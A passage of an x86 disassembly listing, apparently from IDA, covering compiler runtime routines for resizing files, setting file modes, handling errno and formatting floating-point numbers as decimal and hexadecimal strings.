mov ax, [ebp+arg_0]
loc_410585: ; CODE XREF: sub_4104DC+37�j
mov ecx, [ebp+var_4]
xor ecx, ebp
pop esi
call sub_402710
leave
retn
; ---------------------------------------------------------------------------
loc_410592: ; CODE XREF: sub_4104DC+4D�j
mov dword_424218, 1
jmp short loc_410581
sub_4104DC endp
; ---------------------------------------------------------------------------
push 2
call sub_40785D
pop ecx
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4105A7 proc near ; CODE XREF: sub_40E072+36F�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
xor ebx, ebx
push 1
push ebx
push ebx
push [ebp+arg_0]
mov [ebp+var_10], ebx
mov [ebp+var_C], ebx
call sub_40CCBE
mov [ebp+var_18], eax
and eax, edx
add esp, 10h
cmp eax, 0FFFFFFFFh
mov [ebp+var_14], edx
jz short loc_41062D
push 2
push ebx
push ebx
push [ebp+arg_0]
call sub_40CCBE
mov ecx, eax
and ecx, edx
add esp, 10h
cmp ecx, 0FFFFFFFFh
jz short loc_41062D
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_8]
sub esi, eax
sbb edi, edx
js loc_4106C2
jg short loc_410606
cmp esi, ebx
jbe loc_4106C2
loc_410606: ; CODE XREF: sub_4105A7+55�j
mov ebx, 1000h
push ebx
push 8
call ds:dword_41D100 ; GetProcessHeap
push eax
call ds:dword_41D114 ; RtlAllocateHeap
test eax, eax
mov [ebp+var_4], eax
jnz short loc_410639
call sub_4057D3
mov dword ptr [eax], 0Ch
loc_41062D: ; CODE XREF: sub_4105A7+2B�j
; sub_4105A7+43�j ...
call sub_4057D3
mov eax, [eax]
loc_410634: ; CODE XREF: sub_4105A7+1AF�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_410639: ; CODE XREF: sub_4105A7+79�j
push 8000h
push [ebp+arg_0]
call sub_4107CD
pop ecx
pop ecx
mov [ebp+var_8], eax
loc_41064B: ; CODE XREF: sub_4105A7+CF�j
; sub_4105A7+D3�j
test edi, edi
jl short loc_410659
jg short loc_410655
cmp esi, ebx
jb short loc_410659
loc_410655: ; CODE XREF: sub_4105A7+A8�j
mov eax, ebx
jmp short loc_41065B
; ---------------------------------------------------------------------------
loc_410659: ; CODE XREF: sub_4105A7+A6�j
; sub_4105A7+AC�j
mov eax, esi
loc_41065B: ; CODE XREF: sub_4105A7+B0�j
push eax
push [ebp+var_4]
push [ebp+arg_0]
call sub_40CE5A
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_4106A5
cdq
sub esi, eax
sbb edi, edx
js short loc_41067C
jg short loc_41064B
test esi, esi
ja short loc_41064B
loc_41067C: ; CODE XREF: sub_4105A7+CD�j
mov esi, [ebp+var_10]
loc_41067F: ; CODE XREF: sub_4105A7+119�j
push [ebp+var_8]
push [ebp+arg_0]
call sub_4107CD
pop ecx
pop ecx
push [ebp+var_4]
push 0
call ds:dword_41D100 ; GetProcessHeap
push eax
call ds:dword_41D10C ; RtlFreeHeap
xor ebx, ebx
jmp loc_41072B
; ---------------------------------------------------------------------------
loc_4106A5: ; CODE XREF: sub_4105A7+C6�j
call sub_4057E6
cmp dword ptr [eax], 5
jnz short loc_4106BA
call sub_4057D3
mov dword ptr [eax], 0Dh
loc_4106BA: ; CODE XREF: sub_4105A7+106�j
or esi, 0FFFFFFFFh
mov [ebp+var_C], esi
jmp short loc_41067F
; ---------------------------------------------------------------------------
loc_4106C2: ; CODE XREF: sub_4105A7+4F�j
; sub_4105A7+59�j
cmp edi, ebx
jg short loc_410737
jl short loc_4106CC
cmp esi, ebx
jnb short loc_410737
loc_4106CC: ; CODE XREF: sub_4105A7+11F�j
push ebx
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40CCBE
and eax, edx
add esp, 10h
cmp eax, 0FFFFFFFFh
jz loc_41062D
push [ebp+arg_0]
call sub_40ED7D
pop ecx
push eax
call ds:dword_41D0A8 ; SetEndOfFile
neg eax
sbb eax, eax
neg eax
dec eax
cdq
mov [ebp+var_10], eax
and eax, edx
cmp eax, 0FFFFFFFFh
mov [ebp+var_C], edx
jnz short loc_410737
call sub_4057D3
mov dword ptr [eax], 0Dh
call sub_4057E6
mov esi, eax
call ds:dword_41D0F0 ; RtlGetLastWin32Error
mov [esi], eax
mov esi, [ebp+var_10]
loc_41072B: ; CODE XREF: sub_4105A7+F9�j
and esi, [ebp+var_C]
cmp esi, 0FFFFFFFFh
jz loc_41062D
loc_410737: ; CODE XREF: sub_4105A7+11D�j
; sub_4105A7+123�j ...
push ebx
push [ebp+var_14]
push [ebp+var_18]
push [ebp+arg_0]
call sub_40CCBE
and eax, edx
add esp, 10h
cmp eax, 0FFFFFFFFh
jz loc_41062D
xor eax, eax
jmp loc_410634
sub_4105A7 endp
; =============== S U B R O U T I N E =======================================
sub_41075B proc near ; CODE XREF: sub_40E072+322�p
; sub_40E072+37F�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
push esi
call sub_40ED7D
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_41077C
call sub_4057D3
mov dword ptr [eax], 9
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_41077C: ; CODE XREF: sub_41075B+F�j
push edi
push [esp+8+arg_8]
push 0
push [esp+10h+arg_4]
push eax
call ds:dword_41D074 ; SetFilePointer
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_41079D
call ds:dword_41D0F0 ; RtlGetLastWin32Error
jmp short loc_41079F
; ---------------------------------------------------------------------------
loc_41079D: ; CODE XREF: sub_41075B+38�j
xor eax, eax
loc_41079F: ; CODE XREF: sub_41075B+40�j
test eax, eax
jz short loc_4107AF
push eax
call sub_4057F9
pop ecx
or eax, 0FFFFFFFFh
jmp short loc_4107CA
; ---------------------------------------------------------------------------
loc_4107AF: ; CODE XREF: sub_41075B+46�j
mov eax, esi
and esi, 1Fh
imul esi, 28h
sar eax, 5
mov eax, dword_433CA0[eax*4]
lea eax, [eax+esi+4]
and byte ptr [eax], 0FDh
mov eax, edi
loc_4107CA: ; CODE XREF: sub_41075B+52�j
pop edi
pop esi
retn
sub_41075B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4107CD proc near ; CODE XREF: sub_4105A7+9A�p
; sub_4105A7+DE�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov edx, [ebp+arg_0]
mov eax, edx
sar eax, 5
and edx, 1Fh
imul edx, 28h
push ebx
mov ebx, [ebp+arg_4]
push esi
lea esi, ds:433CA0h[eax*4]
mov eax, [esi]
lea ecx, [eax+edx]
movzx eax, byte ptr [ecx+4]
and eax, 80h
mov [ebp+arg_0], eax
mov al, [ecx+24h]
add al, al
movsx eax, al
push edi
mov edi, 4000h
sar eax, 1
cmp ebx, edi
jz short loc_41085F
cmp ebx, 8000h
jz short loc_410859
cmp ebx, 10000h
jz short loc_410845
cmp ebx, 20000h
jz short loc_410845
cmp ebx, 40000h
jnz short loc_41086C
or byte ptr [ecx+4], 80h
mov ecx, [esi]
lea ecx, [ecx+edx+24h]
mov dl, [ecx]
and dl, 81h
or dl, 1
loc_410841: ; CODE XREF: sub_4107CD+8A�j
mov [ecx], dl
jmp short loc_41086C
; ---------------------------------------------------------------------------
loc_410845: ; CODE XREF: sub_4107CD+50�j
; sub_4107CD+58�j
or byte ptr [ecx+4], 80h
mov ecx, [esi]
lea ecx, [ecx+edx+24h]
mov dl, [ecx]
and dl, 82h
or dl, 2
jmp short loc_410841
; ---------------------------------------------------------------------------
loc_410859: ; CODE XREF: sub_4107CD+48�j
and byte ptr [ecx+4], 7Fh
jmp short loc_41086C
; ---------------------------------------------------------------------------
loc_41085F: ; CODE XREF: sub_4107CD+40�j
or byte ptr [ecx+4], 80h
mov ecx, [esi]
lea ecx, [ecx+edx+24h]
and byte ptr [ecx], 80h
loc_41086C: ; CODE XREF: sub_4107CD+60�j
; sub_4107CD+76�j ...
cmp [ebp+arg_0], 0
jnz short loc_410879
mov eax, 8000h
jmp short loc_410884
; ---------------------------------------------------------------------------
loc_410879: ; CODE XREF: sub_4107CD+A3�j
neg eax
sbb eax, eax
and eax, 0C000h
add eax, edi
loc_410884: ; CODE XREF: sub_4107CD+AA�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_4107CD endp
; =============== S U B R O U T I N E =======================================
sub_410889 proc near ; CODE XREF: sub_40E072+40�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
xor esi, esi
cmp eax, esi
jnz short loc_4108B1
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
push 16h
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_4108B1: ; CODE XREF: sub_410889+9�j
mov ecx, dword_426560
mov [eax], ecx
xor eax, eax
pop esi
retn
sub_410889 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4108BD proc near ; CODE XREF: sub_410A38+6�p
; DATA XREF: sub_40F70B+55�o ...
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
push [ebp+arg_4]
lea ecx, [ebp+var_10]
call sub_40271F
mov esi, [ebp+arg_0]
movsx eax, byte ptr [esi]
push eax
call sub_405771
cmp eax, 65h
jmp short loc_4108EC
; ---------------------------------------------------------------------------
loc_4108E0: ; CODE XREF: sub_4108BD+30�j
inc esi
movzx eax, byte ptr [esi]
push eax
call sub_40F17F
test eax, eax
loc_4108EC: ; CODE XREF: sub_4108BD+21�j
pop ecx
jnz short loc_4108E0
movsx eax, byte ptr [esi]
push eax
call sub_405771
cmp eax, 78h
pop ecx
jnz short loc_410900
inc esi
inc esi
loc_410900: ; CODE XREF: sub_4108BD+3F�j
mov ecx, [ebp+var_10]
mov ecx, [ecx+0BCh]
mov ecx, [ecx]
mov al, [esi]
mov cl, [ecx]
mov [esi], cl
inc esi
loc_410912: ; CODE XREF: sub_4108BD+60�j
mov cl, [esi]
mov [esi], al
mov al, cl
mov cl, [esi]
inc esi
test cl, cl
jnz short loc_410912
cmp [ebp+var_4], cl
pop esi
jz short locret_41092C
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
locret_41092C: ; CODE XREF: sub_4108BD+66�j
leave
retn
sub_4108BD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41092E proc near ; CODE XREF: sub_410A46+6�p
; DATA XREF: sub_40F70B+4B�o ...
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
push [ebp+arg_4]
lea ecx, [ebp+var_10]
call sub_40271F
mov eax, [ebp+arg_0]
mov cl, [eax]
test cl, cl
mov esi, [ebp+var_10]
jz short loc_410961
mov edx, [esi+0BCh]
mov edx, [edx]
mov dl, [edx]
loc_410956: ; CODE XREF: sub_41092E+31�j
cmp cl, dl
jz short loc_410961
inc eax
mov cl, [eax]
test cl, cl
jnz short loc_410956
loc_410961: ; CODE XREF: sub_41092E+1C�j
; sub_41092E+2A�j
mov cl, [eax]
inc eax
test cl, cl
jz short loc_41099E
jmp short loc_410975
; ---------------------------------------------------------------------------
loc_41096A: ; CODE XREF: sub_41092E+4B�j
cmp cl, 65h
jz short loc_41097B
cmp cl, 45h
jz short loc_41097B
inc eax
loc_410975: ; CODE XREF: sub_41092E+3A�j
mov cl, [eax]
test cl, cl
jnz short loc_41096A
loc_41097B: ; CODE XREF: sub_41092E+3F�j
; sub_41092E+44�j
mov edx, eax
loc_41097D: ; CODE XREF: sub_41092E+53�j
dec eax
cmp byte ptr [eax], 30h
jz short loc_41097D
mov ecx, [esi+0BCh]
mov ecx, [ecx]
push ebx
mov bl, [eax]
cmp bl, [ecx]
pop ebx
jnz short loc_410994
dec eax
loc_410994: ; CODE XREF: sub_41092E+63�j
; sub_41092E+6E�j
mov cl, [edx]
inc eax
inc edx
test cl, cl
mov [eax], cl
jnz short loc_410994
loc_41099E: ; CODE XREF: sub_41092E+38�j
cmp [ebp+var_4], 0
pop esi
jz short locret_4109AC
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
locret_4109AC: ; CODE XREF: sub_41092E+75�j
leave
retn
sub_41092E endp
; ---------------------------------------------------------------------------
word_4109AE dw 0EED9h ; DATA XREF: sub_40F70B+28�o
; .data:off_423F90�o
dd 424448Bh, 0E0DF18DCh, 7A41C4F6h, 40C03304h, 0C3C033C3h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4109C4 proc near ; CODE XREF: sub_410A04+E�p
; DATA XREF: sub_40F70B+41�o ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_0], 0
push [ebp+arg_C]
push [ebp+arg_8]
jz short loc_4109EE
lea eax, [ebp+var_8]
push eax
call sub_4114AD
mov ecx, [ebp+var_8]
mov eax, [ebp+arg_4]
mov [eax], ecx
mov ecx, [ebp+var_4]
mov [eax+4], ecx
jmp short loc_4109FF
; ---------------------------------------------------------------------------
loc_4109EE: ; CODE XREF: sub_4109C4+F�j
lea eax, [ebp+arg_0]
push eax
call sub_411553
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_0]
mov [eax], ecx
loc_4109FF: ; CODE XREF: sub_4109C4+28�j
add esp, 0Ch
leave
retn
sub_4109C4 endp
; =============== S U B R O U T I N E =======================================
sub_410A04 proc near ; DATA XREF: sub_40F70B+14�o
; .data:off_423F88�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 0
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_4109C4
add esp, 10h
retn
sub_410A04 endp
; =============== S U B R O U T I N E =======================================
sub_410A1B proc near ; CODE XREF: sub_410A54+88�p
; sub_41101E+8A�p ...
test edi, edi
push esi
mov esi, eax
jz short loc_410A36
push esi
call sub_404130
inc eax
push eax
push esi
add esi, edi
push esi
call sub_407370
add esp, 10h
loc_410A36: ; CODE XREF: sub_410A1B+5�j
pop esi
retn
sub_410A1B endp
; =============== S U B R O U T I N E =======================================
sub_410A38 proc near ; DATA XREF: sub_40F70B+1E�o
; .data:off_423F8C�o
arg_0 = dword ptr 4
push 0
push [esp+4+arg_0]
call sub_4108BD
pop ecx
pop ecx
retn
sub_410A38 endp
; =============== S U B R O U T I N E =======================================
sub_410A46 proc near ; DATA XREF: sub_40F70B+A�o
; .data:off_423F84�o
arg_0 = dword ptr 4
push 0
push [esp+4+arg_0]
call sub_41092E
pop ecx
pop ecx
retn
sub_410A46 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410A54 proc near ; CODE XREF: sub_410BC1+B7�p
; sub_4111CC+E1�p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
push [ebp+arg_14]
lea ecx, [ebp+var_10]
mov ebx, eax
call sub_40271F
xor esi, esi
cmp ebx, esi
jnz short loc_410A9B
loc_410A70: ; CODE XREF: sub_410A54+4A�j
call sub_4057D3
push 16h
loc_410A77: ; CODE XREF: sub_410A54+67�j
pop edi
push esi
push esi
push esi
push esi
push esi
mov [eax], edi
call sub_402F39
add esp, 14h
cmp [ebp+var_4], 0
jz short loc_410A94
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_410A94: ; CODE XREF: sub_410A54+37�j
mov eax, edi
jmp loc_410BBC
; ---------------------------------------------------------------------------
loc_410A9B: ; CODE XREF: sub_410A54+1A�j
cmp [ebp+arg_0], esi
jbe short loc_410A70
cmp [ebp+arg_4], esi
jle short loc_410AAA
mov eax, [ebp+arg_4]
jmp short loc_410AAC
; ---------------------------------------------------------------------------
loc_410AAA: ; CODE XREF: sub_410A54+4F�j
xor eax, eax
loc_410AAC: ; CODE XREF: sub_410A54+54�j
add eax, 9
cmp [ebp+arg_0], eax
ja short loc_410ABD
call sub_4057D3
push 22h
jmp short loc_410A77
; ---------------------------------------------------------------------------
loc_410ABD: ; CODE XREF: sub_410A54+5E�j
cmp [ebp+arg_10], 0
jz short loc_410AE1
mov edx, [ebp+arg_C]
xor eax, eax
cmp [ebp+arg_4], esi
setnle al
xor ecx, ecx
cmp dword ptr [edx], 2Dh
setz cl
mov edi, eax
add ecx, ebx
mov eax, ecx
call sub_410A1B
loc_410AE1: ; CODE XREF: sub_410A54+6D�j
mov edi, [ebp+arg_C]
cmp dword ptr [edi], 2Dh
mov esi, ebx
jnz short loc_410AF1
mov byte ptr [ebx], 2Dh
lea esi, [ebx+1]
loc_410AF1: ; CODE XREF: sub_410A54+95�j
cmp [ebp+arg_4], 0
jle short loc_410B0F
lea eax, [esi+1]
mov cl, [eax]
mov [esi], cl
mov esi, eax
mov eax, [ebp+var_10]
mov eax, [eax+0BCh]
mov eax, [eax]
mov al, [eax]
mov [esi], al
loc_410B0F: ; CODE XREF: sub_410A54+A1�j
xor eax, eax
cmp [ebp+arg_10], al
setz al
add eax, [ebp+arg_4]
add esi, eax
cmp [ebp+arg_0], 0FFFFFFFFh
jnz short loc_410B27
or ebx, 0FFFFFFFFh
jmp short loc_410B2C
; ---------------------------------------------------------------------------
loc_410B27: ; CODE XREF: sub_410A54+CC�j
sub ebx, esi
add ebx, [ebp+arg_0]
loc_410B2C: ; CODE XREF: sub_410A54+D1�j
push offset aE000 ; "e+000"
push ebx
push esi
call sub_4076D5
add esp, 0Ch
xor ebx, ebx
test eax, eax
jz short loc_410B4E
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402E3D
add esp, 14h
loc_410B4E: ; CODE XREF: sub_410A54+EB�j
cmp [ebp+arg_8], ebx
lea ecx, [esi+2]
jz short loc_410B59
mov byte ptr [esi], 45h
loc_410B59: ; CODE XREF: sub_410A54+100�j
mov eax, [edi+0Ch]
inc esi
cmp byte ptr [eax], 30h
jz short loc_410B90
mov eax, [edi+4]
dec eax
jns short loc_410B6D
neg eax
mov byte ptr [esi], 2Dh
loc_410B6D: ; CODE XREF: sub_410A54+112�j
inc esi
cmp eax, 64h
jl short loc_410B7D
cdq
push 64h
pop edi
idiv edi
add [esi], al
mov eax, edx
loc_410B7D: ; CODE XREF: sub_410A54+11D�j
inc esi
cmp eax, 0Ah
jl short loc_410B8D
cdq
push 0Ah
pop edi
idiv edi
add [esi], al
mov eax, edx
loc_410B8D: ; CODE XREF: sub_410A54+12D�j
add [esi+1], al
loc_410B90: ; CODE XREF: sub_410A54+10C�j
test byte_426564, 1
jz short loc_410BAD
cmp byte ptr [ecx], 30h
jnz short loc_410BAD
push 3
lea eax, [ecx+1]
push eax
push ecx
call sub_407370
add esp, 0Ch
loc_410BAD: ; CODE XREF: sub_410A54+143�j
; sub_410A54+148�j
cmp [ebp+var_4], 0
jz short loc_410BBA
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_410BBA: ; CODE XREF: sub_410A54+15D�j
xor eax, eax
loc_410BBC: ; CODE XREF: sub_410A54+42�j
pop edi
pop esi
pop ebx
leave
retn
sub_410A54 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410BC1 proc near ; CODE XREF: sub_410C8F+14�p
; sub_4112C4+7C�p
var_2C = dword ptr -2Ch
var_1C = byte ptr -1Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
push 16h
pop esi
push esi
lea ecx, [ebp+var_1C]
push ecx
lea ecx, [ebp+var_2C]
push ecx
push dword ptr [eax+4]
push dword ptr [eax]
call sub_411771
xor ebx, ebx
add esp, 14h
cmp edi, ebx
jnz short loc_410C11
loc_410BF9: ; CODE XREF: sub_410BC1+55�j
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov [eax], esi
call sub_402F39
add esp, 14h
mov eax, esi
jmp short loc_410C80
; ---------------------------------------------------------------------------
loc_410C11: ; CODE XREF: sub_410BC1+36�j
mov eax, [ebp+arg_8]
cmp eax, ebx
jbe short loc_410BF9
cmp eax, 0FFFFFFFFh
mov esi, [ebp+arg_C]
jnz short loc_410C25
or eax, 0FFFFFFFFh
jmp short loc_410C39
; ---------------------------------------------------------------------------
loc_410C25: ; CODE XREF: sub_410BC1+5D�j
xor ecx, ecx
cmp [ebp+var_2C], 2Dh
setz cl
sub eax, ecx
xor ecx, ecx
cmp esi, ebx
setnle cl
sub eax, ecx
loc_410C39: ; CODE XREF: sub_410BC1+62�j
lea ecx, [ebp+var_2C]
push ecx
lea ecx, [esi+1]
push ecx
push eax
xor eax, eax
cmp [ebp+var_2C], 2Dh
setz al
xor ecx, ecx
cmp esi, ebx
setnle cl
add eax, edi
add ecx, eax
push ecx
call sub_4115F9
add esp, 10h
cmp eax, ebx
jz short loc_410C67
mov [edi], bl
jmp short loc_410C80
; ---------------------------------------------------------------------------
loc_410C67: ; CODE XREF: sub_410BC1+A0�j
push [ebp+arg_14]
lea eax, [ebp+var_2C]
push ebx
push eax
push [ebp+arg_10]
mov eax, edi
push esi
push [ebp+arg_8]
call sub_410A54
add esp, 18h
loc_410C80: ; CODE XREF: sub_410BC1+4E�j
; sub_410BC1+A4�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_410BC1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410C8F proc near ; CODE XREF: sub_410CAD+BD�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push 0
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_410BC1
add esp, 18h
pop ebp
retn
sub_410C8F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410CAD proc near ; CODE XREF: sub_4112C4+63�p
var_24 = dword ptr -24h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 24h
push esi
push edi
push [ebp+arg_14]
lea ecx, [ebp+var_24]
mov [ebp+var_14], 3FFh
xor edi, edi
mov [ebp+var_4], 30h
call sub_40271F
cmp [ebp+arg_C], edi
jge short loc_410CD8
mov [ebp+arg_C], edi
loc_410CD8: ; CODE XREF: sub_410CAD+26�j
mov esi, [ebp+arg_4]
cmp esi, edi
jnz short loc_410D0A
loc_410CDF: ; CODE XREF: sub_410CAD+60�j
call sub_4057D3
push 16h
loc_410CE6: ; CODE XREF: sub_410CAD+77�j
pop esi
push edi
push edi
push edi
push edi
push edi
mov [eax], esi
call sub_402F39
add esp, 14h
cmp [ebp+var_18], 0
jz short loc_410D03
mov eax, [ebp+var_1C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_410D03: ; CODE XREF: sub_410CAD+4D�j
mov eax, esi
jmp loc_41101A
; ---------------------------------------------------------------------------
loc_410D0A: ; CODE XREF: sub_410CAD+30�j
cmp [ebp+arg_8], edi
jbe short loc_410CDF
mov eax, [ebp+arg_C]
add eax, 0Bh
cmp [ebp+arg_8], eax
mov byte ptr [esi], 0
ja short loc_410D26
call sub_4057D3
push 22h
jmp short loc_410CE6
; ---------------------------------------------------------------------------
loc_410D26: ; CODE XREF: sub_410CAD+6E�j
mov edi, [ebp+arg_0]
mov eax, [edi]
mov [ebp+var_C], eax
mov eax, [edi+4]
mov ecx, eax
shr ecx, 14h
mov edx, 7FFh
push ebx
and ecx, edx
xor ebx, ebx
cmp ecx, edx
jnz loc_410DD8
test ebx, ebx
jnz loc_410DD8
mov eax, [ebp+arg_8]
cmp eax, 0FFFFFFFFh
jnz short loc_410D5C
or eax, eax
jmp short loc_410D5F
; ---------------------------------------------------------------------------
loc_410D5C: ; CODE XREF: sub_410CAD+A9�j
add eax, 0FFFFFFFEh
loc_410D5F: ; CODE XREF: sub_410CAD+AD�j
push 0
push [ebp+arg_C]
lea ebx, [esi+2]
push eax
push ebx
push edi
call sub_410C8F
add esp, 14h
test eax, eax
jz short loc_410D8F
cmp [ebp+var_18], 0
mov byte ptr [esi], 0
jz loc_411019
mov ecx, [ebp+var_1C]
and dword ptr [ecx+70h], 0FFFFFFFDh
jmp loc_411019
; ---------------------------------------------------------------------------
loc_410D8F: ; CODE XREF: sub_410CAD+C7�j
cmp byte ptr [ebx], 2Dh
jnz short loc_410D98
mov byte ptr [esi], 2Dh
inc esi
loc_410D98: ; CODE XREF: sub_410CAD+E5�j
mov byte ptr [esi], 30h
inc esi
cmp [ebp+arg_10], 0
push 65h
setz al
dec al
and al, 0E0h
add al, 78h
mov [esi], al
inc esi
push esi
call sub_411480
test eax, eax
pop ecx
pop ecx
jz loc_41100A
cmp [ebp+arg_10], 0
setz cl
dec cl
and cl, 0E0h
add cl, 70h
mov [eax], cl
mov byte ptr [eax+3], 0
jmp loc_41100A
; ---------------------------------------------------------------------------
loc_410DD8: ; CODE XREF: sub_410CAD+95�j
; sub_410CAD+9D�j
and eax, 80000000h
xor ecx, ecx
or ecx, eax
jz short loc_410DE7
mov byte ptr [esi], 2Dh
inc esi
loc_410DE7: ; CODE XREF: sub_410CAD+134�j
mov ebx, [ebp+arg_10]
mov byte ptr [esi], 30h
inc esi
test ebx, ebx
setz al
dec al
and al, 0E0h
add al, 78h
mov [esi], al
mov ecx, [edi+4]
inc esi
neg ebx
sbb ebx, ebx
and ebx, 0FFFFFFE0h
and ecx, 7FF00000h
xor eax, eax
add ebx, 27h
xor edx, edx
or eax, ecx
jnz short loc_410E38
mov byte ptr [esi], 30h
mov ecx, [edi+4]
mov eax, [edi]
and ecx, 0FFFFFh
inc esi
or eax, ecx
jnz short loc_410E2F
mov [ebp+var_14], edx
jmp short loc_410E3C
; ---------------------------------------------------------------------------
loc_410E2F: ; CODE XREF: sub_410CAD+17B�j
mov [ebp+var_14], 3FEh
jmp short loc_410E3C
; ---------------------------------------------------------------------------
loc_410E38: ; CODE XREF: sub_410CAD+168�j
mov byte ptr [esi], 31h
inc esi
loc_410E3C: ; CODE XREF: sub_410CAD+180�j
; sub_410CAD+189�j
mov eax, esi
inc esi
cmp [ebp+arg_C], edx
mov [ebp+arg_4], eax
jnz short loc_410E4B
mov [eax], dl
jmp short loc_410E5A
; ---------------------------------------------------------------------------
loc_410E4B: ; CODE XREF: sub_410CAD+198�j
mov ecx, [ebp+var_24]
mov ecx, [ecx+0BCh]
mov ecx, [ecx]
mov cl, [ecx]
mov [eax], cl
loc_410E5A: ; CODE XREF: sub_410CAD+19C�j
mov ecx, [edi+4]
mov eax, [edi]
and ecx, 0FFFFFh
mov [ebp+var_8], ecx
ja short loc_410E72
cmp eax, edx
jbe loc_410F27
loc_410E72: ; CODE XREF: sub_410CAD+1BB�j
mov [ebp+var_C], edx
mov [ebp+var_8], 0F0000h
loc_410E7C: ; CODE XREF: sub_410CAD+220�j
cmp [ebp+arg_C], 0
jle short loc_410ECF
mov edx, [edi+4]
and edx, [ebp+var_8]
mov eax, [edi]
movsx ecx, word ptr [ebp+var_4]
and eax, [ebp+var_C]
and edx, 0FFFFFh
call sub_4118E0
add ax, 30h
movzx eax, ax
cmp ax, 39h
jbe short loc_410EAB
add eax, ebx
loc_410EAB: ; CODE XREF: sub_410CAD+1FA�j
mov ecx, [ebp+var_8]
sub [ebp+var_4], 4
mov [esi], al
mov eax, [ebp+var_C]
shrd eax, ecx, 4
shr ecx, 4
inc esi
dec [ebp+arg_C]
cmp word ptr [ebp+var_4], 0
mov [ebp+var_C], eax
mov [ebp+var_8], ecx
jge short loc_410E7C
loc_410ECF: ; CODE XREF: sub_410CAD+1D3�j
cmp word ptr [ebp+var_4], 0
jl short loc_410F27
mov edx, [edi+4]
and edx, [ebp+var_8]
mov eax, [edi]
movsx ecx, word ptr [ebp+var_4]
and eax, [ebp+var_C]
and edx, 0FFFFFh
call sub_4118E0
cmp ax, 8
jbe short loc_410F27
lea eax, [esi-1]
loc_410EF9: ; CODE XREF: sub_410CAD+25C�j
mov cl, [eax]
cmp cl, 66h
jz short loc_410F05
cmp cl, 46h
